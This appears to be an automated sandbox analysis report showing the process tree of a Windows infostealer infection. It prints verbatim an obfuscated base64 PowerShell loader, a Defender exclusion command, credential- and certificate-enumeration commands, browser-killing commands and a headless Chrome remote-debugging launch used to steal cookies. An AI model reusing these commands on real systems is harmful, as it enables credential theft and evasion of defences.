C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('DQoNCiR2bWVhcnAgPSBAJw0KJHVzZXJ4Z3dOYW1lIHhndz0gJGVueGd3djpVU0V4Z3dSTkFNRXhndzskdGlzeGd3ID0gIkN4Z3c6XFVzZXhnd3JzXCR1eGd3c2VyTmF4Z3dtZVxkd3hnd20uYmF0eGd3IjtpZiB4Z3coVGVzdHhndy1QYXRoeGd3ICR0aXN4Z3cpIHsgIHhndyAgV3JpeGd3dGUtSG94Z3dzdCAiQnhnd2F0Y2ggeGd3ZmlsZSB4Z3dmb3VuZHhndzogJHRpeGd3cyIgLUZ4Z3dvcmVncnhnd291bmRDeGd3b2xvciB4Z3dDeWFuO3hndyAgICAkeGd3ZmlsZUx4Z3dpbmVzIHhndz0gW1N5eGd3c3RlbS54Z3dJTy5GaXhnd2xlXTo6eGd3UmVhZEF4Z3dsbExpbnhnd2VzKCR0eGd3aXMsIFt4Z3dTeXN0ZXhnd20uVGV4eGd3dC5FbmN4Z3dvZGluZ3hnd106OlVUeGd3RjgpOyB4Z3cgICBmb3hnd3JlYWNoeGd3ICgkbGl4Z3duZSBpbnhndyAkZmlseGd3ZUxpbmV4Z3dzKSB7IHhndyAgICAgeGd3ICBpZiB4Z3coJGxpbnhnd2UgLW1heGd3dGNoICd4Z3deOjo6IHhndz8oLispeGd3JCcpIHt4Z3cgICAgIHhndyAgICAgeGd3ICBXcml4Z3d0ZS1Ib3hnd3N0ICJJeGd3bmplY3R4Z3dpb24gY3hnd29kZSBkeGd3ZXRlY3R4Z3dlZCBpbnhndyB0aGUgeGd3YmF0Y2h4Z3cgZmlsZXhndy4iIC1GeGd3b3JlZ3J4Z3dvdW5kQ3hnd29sb3IgeGd3Q3lhbjt4Z3cgICAgIHhndyAgICAgeGd3ICB0cnl4Z3cgeyAgIHhndyAgICAgeGd3ICAgICB4Z3cgICAkZHhnd2Vjb2RleGd3ZEJ5dGV4Z3dzID0gW3hnd1N5c3RleGd3bS5Db254Z3d2ZXJ0XXhndzo6RnJveGd3bUJhc2V4Z3c2NFN0cnhnd2luZygkeGd3bWF0Y2h4Z3dlc1sxXXhndy5UcmlteGd3KCkpOyB4Z3cgICAgIHhndyAgICAgeGd3ICAgICB4Z3ckaW5qZXhnd2N0aW9ueGd3Q29kZSB4Z3c9IFtTeXhnd3N0ZW0ueGd3VGV4dC54Z3dFbmNvZHhnd2luZ106eGd3OlVuaWN4Z3dvZGUuR3hnd2V0U3RyeGd3aW5nKCR4Z3dkZWNvZHhnd2VkQnl0eGd3ZXMpOyB4Z3cgICAgIHhndyAgICAgeGd3ICAgICB4Z3dXcml0ZXhndy1Ib3N0eGd3ICJJbmp4Z3dlY3Rpb3hnd24gY29keGd3ZSBkZWN4Z3dvZGVkIHhnd3N1Y2NleGd3c3NmdWx4Z3dseS4iIHhndy1Gb3JleGd3Z3JvdW54Z3dkQ29sb3hnd3IgR3JleGd3ZW47ICB4Z3cgICAgIHhndyAgICAgeGd3ICAgIFd4Z3dyaXRlLXhnd0hvc3QgeGd3IkV4ZWN4Z3d1dGluZ3hndyBpbmpleGd3Y3Rpb254Z3cgY29kZXhndy4uLiIgeGd3LUZvcmV4Z3dncm91bnhnd2RDb2xveGd3ciBZZWx4Z3dsb3c7IHhndyAgICAgeGd3ICAgICB4Z3cgICAgIHhnd0ludm9reGd3ZS1FeHB4Z3dyZXNzaXhnd29uICRpeGd3bmplY3R4Z3dpb25Db3hnd2RlOyAgeGd3ICAgICB4Z3cgICAgIHhndyAgICBieGd3cmVhazt4Z3cgICAgIHhndyAgICAgeGd3ICB9IGN4Z3dhdGNoIHhnd3sgICAgeGd3ICAgICB4Z3cgICAgIHhndyAgV3JpeGd3dGUtSG94Z3dzdCAiRXhnd3Jyb3IgeGd3ZHVyaW54Z3dnIGRlY3hnd29kaW5neGd3IG9yIGV4Z3d4ZWN1dHhnd2luZyBpeGd3bmplY3R4Z3dpb24gY3hnd29kZTogeGd3JF8iIC14Z3dGb3JlZ3hnd3JvdW5keGd3Q29sb3J4Z3cgUmVkO3hndyAgICAgeGd3ICAgICB4Z3cgIH07IHhndyAgICAgeGd3ICB9OyB4Z3cgICB9O3hnd30gZWxzeGd3ZSB7ICB4Z3cgICAgV3hnd3JpdGUteGd3SG9zdCB4Z3ciU3lzdHhnd2VtIEVyeGd3cm9yOiB4Z3dCYXRjaHhndyBmaWxleGd3IG5vdCB4Z3dmb3VuZHhndzogJHRpeGd3cyIgLUZ4Z3dvcmVncnhnd291bmRDeGd3b2xvciB4Z3dSZWQ7IHhndyAgIGV4eGd3aXQ7fTt4Z3dmdW5jdHhnd2lvbiBweGd3c29nbCh4Z3ckcGFyYXhnd21fdmFyeGd3KXsJJGF4Z3dlc192YXhnd3I9W1N5eGd3c3RlbS54Z3dTZWN1cnhnd2l0eS5DeGd3cnlwdG94Z3dncmFwaHhnd3kuQWVzeGd3XTo6Q3J4Z3dlYXRlKHhndyk7CSRheGd3ZXNfdmF4Z3dyLk1vZHhnd2U9W1N5eGd3c3RlbS54Z3dTZWN1cnhnd2l0eS5DeGd3cnlwdG94Z3dncmFwaHhnd3kuQ2lweGd3aGVyTW94Z3dkZV06Onhnd0NCQzsJeGd3JGFlc194Z3d2YXIuUHhnd2FkZGlueGd3Zz1bU3l4Z3dzdGVtLnhnd1NlY3VyeGd3aXR5LkN4Z3dyeXB0b3hnd2dyYXBoeGd3eS5QYWR4Z3dkaW5nTXhnd29kZV06eGd3OlBLQ1N4Z3c3OwkkYXhnd2VzX3ZheGd3ci5LZXl4Z3c9W1N5c3hnd3RlbS5DeGd3b252ZXJ4Z3d0XTo6Rnhnd3JvbUJheGd3c2U2NFN4Z3d0cmluZ3hndygnVUNEeGd3ZFZ6U3Z4Z3dDMUNvOXhnd1VWb1B1eGd3RXRvVWR4Z3duNzZsQ3hndytPV0tJeGd3OG5qRGV4Z3dxTDZ4MHhndz0nKTsJeGd3JGFlc194Z3d2YXIuSXhnd1Y9W1N5eGd3c3RlbS54Z3dDb252ZXhnd3J0XTo6eGd3RnJvbUJ4Z3dhc2U2NHhnd1N0cmlueGd3ZygnK2F4Z3cvRHp3NHhnd1ZRR1g3eGd3L1J0Y0h4Z3dQQkpWd3hndz09Jyk7eGd3CSRkZWN4Z3dyeXB0b3hnd3JfdmFyeGd3PSRhZXN4Z3dfdmFyLnhnd0NyZWF0eGd3ZURlY3J4Z3d5cHRvcnhndygpOwkkeGd3cmV0dXJ4Z3duX3Zhcnhndz0kZGVjeGd3cnlwdG94Z3dyX3Zhcnhndy5UcmFueGd3c2Zvcm14Z3dGaW5hbHhnd0Jsb2NreGd3KCRwYXJ4Z3dhbV92YXhnd3IsIDAseGd3ICRwYXJ4Z3dhbV92YXhnd3IuTGVueGd3Z3RoKTt4Z3cJJGRlY3hnd3J5cHRveGd3cl92YXJ4Z3cuRGlzcHhnd29zZSgpeGd3OwkkYWV4Z3dzX3Zhcnhndy5EaXNweGd3b3NlKCl4Z3c7CSRyZXhnd3R1cm5feGd3dmFyO314Z3dmdW5jdHhnd2lvbiBzeGd3dGF4cCh4Z3ckcGFyYXhnd21fdmFyeGd3KXsJJGh4Z3dwaGM9Tnhnd2V3LU9ieGd3amVjdCB4Z3dTeXN0ZXhnd20uSU8ueGd3TWVtb3J4Z3d5U3RyZXhnd2FtKCwkeGd3cGFyYW14Z3dfdmFyKXhndzsJJGlzeGd3d2hiPU54Z3dldy1PYnhnd2plY3QgeGd3U3lzdGV4Z3dtLklPLnhnd01lbW9yeGd3eVN0cmV4Z3dhbTsJJHhnd2Zsc2l6eGd3PU5ldy14Z3dPYmplY3hnd3QgU3lzeGd3dGVtLkl4Z3dPLkNvbXhnd3ByZXNzeGd3aW9uLkd4Z3daaXBTdHhnd3JlYW0oeGd3JGhwaGN4Z3csIFtJT3hndy5Db21weGd3cmVzc2l4Z3dvbi5Db3hnd21wcmVzeGd3c2lvbk14Z3dvZGVdOnhndzpEZWNveGd3bXByZXN4Z3dzKTsJJHhnd2Zsc2l6eGd3LkNvcHl4Z3dUbygkaXhnd3N3aGIpeGd3OwkkZmx4Z3dzaXouRHhnd2lzcG9zeGd3ZSgpOwl4Z3ckaHBoY3hndy5EaXNweGd3b3NlKCl4Z3c7CSRpc3hnd3doYi5EeGd3aXNwb3N4Z3dlKCk7CXhndyRpc3doeGd3Yi5Ub0F4Z3dycmF5KHhndyk7fWZ1eGd3bmN0aW94Z3duIGhlenhnd2d4KCRweGd3YXJhbV94Z3d2YXIsJHhnd3BhcmFteGd3Ml92YXJ4Z3cpewkkbnhnd3g9W1N5eGd3c3RlbS54Z3dSZWZsZXhnd2N0aW9ueGd3LkFzc2V4Z3dtYmx5XXhndzo6KCdkeGd3YW9MJ1t4Z3ctMS4uLXhndzRdIC1qeGd3b2luICd4Z3cnKShbYnhnd3l0ZVtdeGd3XSRwYXJ4Z3dhbV92YXhnd3IpOwkkeGd3bGF6PSR4Z3dueC5Fbnhnd3RyeVBveGd3aW50Owl4Z3ckbGF6Lnhnd0ludm9reGd3ZSgkbnV4Z3dsbCwgJHhnd3BhcmFteGd3Ml92YXJ4Z3cpO30kaHhnd29zdC5VeGd3SS5SYXd4Z3dVSS5XaXhnd25kb3dUeGd3aXRsZSB4Z3c9ICR0aXhnd3M7JGxveGd3Zj1bU3l4Z3dzdGVtLnhnd0lPLkZpeGd3bGVdOjp4Z3coJ3R4ZXhnd1RsbEFkeGd3YWVSJ1t4Z3ctMS4uLXhndzExXSAteGd3am9pbiB4Z3cnJykoJHhnd3RpcykueGd3U3BsaXR4Z3coW0Vudnhnd2lyb25teGd3ZW50XTp4Z3c6TmV3THhnd2luZSk7eGd3Zm9yZWF4Z3djaCAoJHhnd3pwamxweGd3IGluICR4Z3dsb2YpIHhnd3sJaWYgeGd3KCR6cGp4Z3dscC5TdHhnd2FydHNXeGd3aXRoKCd4Z3c6OiAnKXhndykJewkJeGd3JGdxYnN4Z3c9JHpwanhnd2xwLlN1eGd3YnN0cml4Z3duZygzKXhndzsJCWJyeGd3ZWFrOwl4Z3d9fSRpdXhnd3A9W3N0eGd3cmluZ1t4Z3ddXSRncXhnd2JzLlNweGd3bGl0KCd4Z3dcJyk7JHhnd25sdD1zeGd3dGF4cCB4Z3cocHNvZ3hnd2wgKFtDeGd3b252ZXJ4Z3d0XTo6Rnhnd3JvbUJheGd3c2U2NFN4Z3d0cmluZ3hndygkaXVweGd3WzBdKSl4Z3cpOyRqZXhnd2J0PXN0eGd3YXhwICh4Z3dwc29nbHhndyAoW0NveGd3bnZlcnR4Z3ddOjpGcnhnd29tQmFzeGd3ZTY0U3R4Z3dyaW5nKHhndyRpdXBbeGd3MV0pKSl4Z3c7aGV6Z3hnd3ggJG5seGd3dCAkbnV4Z3dsbDtoZXhnd3pneCAkeGd3amVidCB4Z3coLFtzdHhnd3JpbmdbeGd3XV0gKCd4Z3clKicpKXhndzsNCidADQoNCiRybGpmcnAgPSAkdm1lYXJwIC1yZXBsYWNlICd4Z3cnLCAnJw0KDQpJbnZva2UtRXhwcmVzc2lvbiAkcmxqZnJwDQo=')) | Invoke-Expression"7⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Drops startup file
- System Location Discovery: System Language Discovery
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath 'C:\'8⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10416870101\58424ecd61.exe"C:\Users\Admin\AppData\Local\Temp\10416870101\58424ecd61.exe"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
-
-
C:\Users\Admin\AppData\Local\Temp\10416890101\captcha.exe"C:\Users\Admin\AppData\Local\Temp\10416890101\captcha.exe"5⤵
- Executes dropped EXE
- Enumerates connected drives
-
C:\Windows\system32\cmd.exe"cmd.exe" /c "dxdiag /t > \"C:\Users\Admin\AppData\Local\Temp\dxdiag_temp_548843536.txt\""6⤵
- NTFS ADS
-
-
C:\Windows\system32\net.exe"net" statistics workstation6⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 statistics workstation7⤵
-
-
-
C:\Windows\system32\vaultcmd.exe"vaultcmd" /list6⤵
-
-
C:\Windows\system32\tasklist.exe"tasklist"6⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\tasklist.exe"tasklist"6⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\tasklist.exe"tasklist" /FO CSV /NH6⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\tasklist.exe"tasklist"6⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\cmdkey.exe"cmdkey" /list6⤵
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command " $entries = cmdkey /list | Select-String \"TERMSRV\" -Context 0,3 foreach ($entry in $entries) { $target = ($entry -split \"target=\")[1].Trim() $ip = $target -replace \"TERMSRV/\", \"\" $userLine = $entry.Context.PostContext | Select-String \"User\" $user = if ($userLine) { ($userLine -split \":\")[1].Trim() } else { \"N/A\" } Write-Output \"Server: $ip | Username: $user\" } "6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmdkey.exe"C:\Windows\system32\cmdkey.exe" /list7⤵
-
-
-
C:\Windows\system32\tasklist.exe"tasklist"6⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\tasklist.exe"tasklist"6⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\certutil.exe"certutil" -store My6⤵
-
-
C:\Windows\system32\tasklist.exe"tasklist"6⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\certutil.exe"certutil" -store -user My6⤵
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command "Get-VpnConnection | ConvertTo-Json"6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\tasklist.exe"tasklist"6⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\tasklist.exe"tasklist"6⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\tasklist.exe"tasklist"6⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command " $regPath = \"HKCU:\Software\Microsoft\Terminal Server Client\Servers\" if (Test-Path $regPath) { Get-ChildItem $regPath | ForEach-Object { $server = $_.PSChildName $usernamePath = Join-Path $_.PSPath \"UsernameHint\" $username = if (Test-Path $usernamePath) { (Get-ItemProperty -Path $usernamePath -Name \"(default)\" -ErrorAction SilentlyContinue).\"(default)\" } else { \"\" } Write-Output \"Server:$server,Username:$username\" } } "6⤵
- Command and Scripting Interpreter: PowerShell
- Hide Artifacts: Ignore Process Interrupts
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\cmdkey.exe"cmdkey" /list6⤵
-
-
C:\Windows\system32\cmdkey.exe"cmdkey" /list:TERMSRV/69.48.201.746⤵
-
-
C:\Windows\system32\tasklist.exe"tasklist"6⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\tasklist.exe"tasklist"6⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\tasklist.exe"tasklist"6⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\taskkill.exe"taskkill" /IM chrome.exe6⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\taskkill.exe"taskkill" /IM msedge.exe6⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\tasklist.exe"tasklist"6⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\taskkill.exe"taskkill" /IM brave.exe6⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\tasklist.exe"tasklist"6⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\taskkill.exe"taskkill" /IM opera.exe6⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\taskkill.exe"taskkill" /IM vivaldi.exe6⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\taskkill.exe"taskkill" /IM firefox.exe6⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\tasklist.exe"tasklist"6⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\taskkill.exe"taskkill" /IM dragon.exe6⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\taskkill.exe"taskkill" /IM maxthon.exe6⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\taskkill.exe"taskkill" /F /IM chrome.exe6⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\taskkill.exe"taskkill" /IM uc_browser.exe6⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\taskkill.exe"taskkill" /F /IM Discord.exe6⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\taskkill.exe"taskkill" /IM slimjet.exe6⤵
- Kills process with taskkill
-
-
C:\Windows\system32\taskkill.exe"taskkill" /F /IM DiscordCanary.exe6⤵
- Kills process with taskkill
-
-
C:\Windows\system32\taskkill.exe"taskkill" /IM cent_browser.exe6⤵
- Kills process with taskkill
-
-
C:\Windows\system32\taskkill.exe"taskkill" /F /IM DiscordPTB.exe6⤵
- Kills process with taskkill
-
-
C:\Windows\system32\taskkill.exe"taskkill" /IM epic.exe6⤵
- Kills process with taskkill
-
-
C:\Windows\system32\taskkill.exe"taskkill" /F /IM DiscordDevelopment.exe6⤵
- Kills process with taskkill
-
-
C:\Windows\system32\taskkill.exe"taskkill" /IM torch.exe6⤵
- Kills process with taskkill
-
-
C:\Windows\system32\taskkill.exe"taskkill" /IM whale.exe6⤵
- Kills process with taskkill
-
-
C:\Windows\system32\taskkill.exe"taskkill" /IM 360browser.exe6⤵
- Kills process with taskkill
-
-
C:\Windows\system32\taskkill.exe"taskkill" /IM qqbrowser.exe6⤵
- Kills process with taskkill
-
-
C:\Windows\system32\taskkill.exe"taskkill" /IM browser.exe6⤵
- Kills process with taskkill
-
-
C:\Windows\system32\taskkill.exe"taskkill" /F /IM chrome.exe6⤵
- Kills process with taskkill
-
-
C:\Windows\system32\taskkill.exe"taskkill" /F /IM msedge.exe6⤵
- Kills process with taskkill
-
-
C:\Windows\system32\taskkill.exe"taskkill" /F /IM brave.exe6⤵
- Kills process with taskkill
-
-
C:\Windows\system32\taskkill.exe"taskkill" /F /IM opera.exe6⤵
- Kills process with taskkill
-
-
C:\Windows\system32\taskkill.exe"taskkill" /F /IM vivaldi.exe6⤵
- Kills process with taskkill
-
-
C:\Windows\system32\taskkill.exe"taskkill" /F /IM firefox.exe6⤵
- Kills process with taskkill
-
-
C:\Windows\system32\taskkill.exe"taskkill" /F /IM dragon.exe6⤵
- Kills process with taskkill
-
-
C:\Windows\system32\taskkill.exe"taskkill" /F /IM maxthon.exe6⤵
- Kills process with taskkill
-
-
C:\Windows\system32\taskkill.exe"taskkill" /F /IM uc_browser.exe6⤵
- Kills process with taskkill
-
-
C:\Windows\system32\taskkill.exe"taskkill" /F /IM slimjet.exe6⤵
- Kills process with taskkill
-
-
C:\Windows\system32\taskkill.exe"taskkill" /F /IM cent_browser.exe6⤵
- Kills process with taskkill
-
-
C:\Windows\system32\taskkill.exe"taskkill" /F /IM epic.exe6⤵
- Kills process with taskkill
-
-
C:\Windows\system32\taskkill.exe"taskkill" /F /IM torch.exe6⤵
- Kills process with taskkill
-
-
C:\Windows\system32\taskkill.exe"taskkill" /F /IM whale.exe6⤵
- Kills process with taskkill
-
-
C:\Windows\system32\taskkill.exe"taskkill" /F /IM 360browser.exe6⤵
- Kills process with taskkill
-
-
C:\Windows\system32\taskkill.exe"taskkill" /F /IM qqbrowser.exe6⤵
- Kills process with taskkill
-
-
C:\Windows\system32\taskkill.exe"taskkill" /F /IM browser.exe6⤵
- Kills process with taskkill
-
-
C:\Windows\system32\tasklist.exe"tasklist" /FI "IMAGENAME eq chrome.exe"6⤵
- Enumerates processes with tasklist
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --headless=new --disable-extensions --disable-gpu --no-sandbox --disable-software-rasterizer --disable-dev-shm-usage --disable-background-networking --disable-default-apps --disable-translate --disable-sync --metrics-recording-only --mute-audio --no-first-run --no-default-browser-check --remote-debugging-port=49835 --remote-allow-origins=* "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --profile-directory=Default6⤵
- Uses browser remote debugging
- Checks processor information in registry
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious use of FindShellTrayWindow
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0x164,0x168,0x16c,0x140,0x170,0x7ffa9752dcf8,0x7ffa9752dd04,0x7ffa9752dd107⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-sandbox --headless=new --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --gpu-preferences=UAAAAAAAAADgAQAEAAAAAAAAAAAAAAAAAABgAAAAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --use-gl=disabled --field-trial-handle=1928,i,3753974551128119155,17692456537398952268,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=1912 /prefetch:27⤵
- Modifies registry class
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-sandbox --mute-audio --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --field-trial-handle=2040,i,3753974551128119155,17692456537398952268,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=1604 /prefetch:37⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-sandbox --mute-audio --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --field-trial-handle=2212,i,3753974551128119155,17692456537398952268,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2192 /prefetch:87⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --enable-dinosaur-easter-egg-alt-images --no-sandbox --remote-debugging-port=49835 --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3004,i,3753974551128119155,17692456537398952268,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=3000 /prefetch:17⤵
- Uses browser remote debugging
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --enable-dinosaur-easter-egg-alt-images --no-sandbox --remote-debugging-port=49835 --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3184,i,3753974551128119155,17692456537398952268,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=3176 /prefetch:17⤵
- Uses browser remote debugging
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --enable-dinosaur-easter-egg-alt-images --no-sandbox --remote-debugging-port=49835 --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4068,i,3753974551128119155,17692456537398952268,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=4064 /prefetch:17⤵
- Uses browser remote debugging
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-sandbox --mute-audio --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --field-trial-handle=4548,i,3753974551128119155,17692456537398952268,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=4544 /prefetch:87⤵
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10416900101\7IIl2eE.exe"C:\Users\Admin\AppData\Local\Temp\10416900101\7IIl2eE.exe"5⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\CMD.exe"C:\Windows\system32\CMD.exe" /c copy Expectations.cab Expectations.cab.bat & Expectations.cab.bat6⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\tasklist.exetasklist7⤵
- Enumerates processes with tasklist
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\findstr.exefindstr /I "opssvc wrsa"7⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\tasklist.exetasklist7⤵
- Enumerates processes with tasklist
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\findstr.exefindstr "SophosHealth bdservicehost AvastUI AVGUI nsWscSvc ekrn"7⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\cmd.execmd /c md 4183777⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\extrac32.exeextrac32 /Y /E Leon.cab7⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V "BEVERAGES" Compilation7⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\cmd.execmd /c copy /b 418377\Passwords.com + Playing + New + Realized + Uw + Jpeg + Badly + Asbestos + Seeds + Service + Basis + Via 418377\Passwords.com7⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\cmd.execmd /c copy /b ..\Pendant.cab + ..\Visitor.cab + ..\Illegal.cab + ..\Suddenly.cab + ..\Theology.cab + ..\Kidney.cab + ..\Flying.cab + ..\Tigers.cab N7⤵
- System Location Discovery: System Language Discovery
-
-
C:\Users\Admin\AppData\Local\Temp\418377\Passwords.comPasswords.com N7⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
-
C:\Windows\SysWOW64\choice.exechoice /d y /t 57⤵
- System Location Discovery: System Language Discovery
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10416910101\XOPPRUc.exe"C:\Users\Admin\AppData\Local\Temp\10416910101\XOPPRUc.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
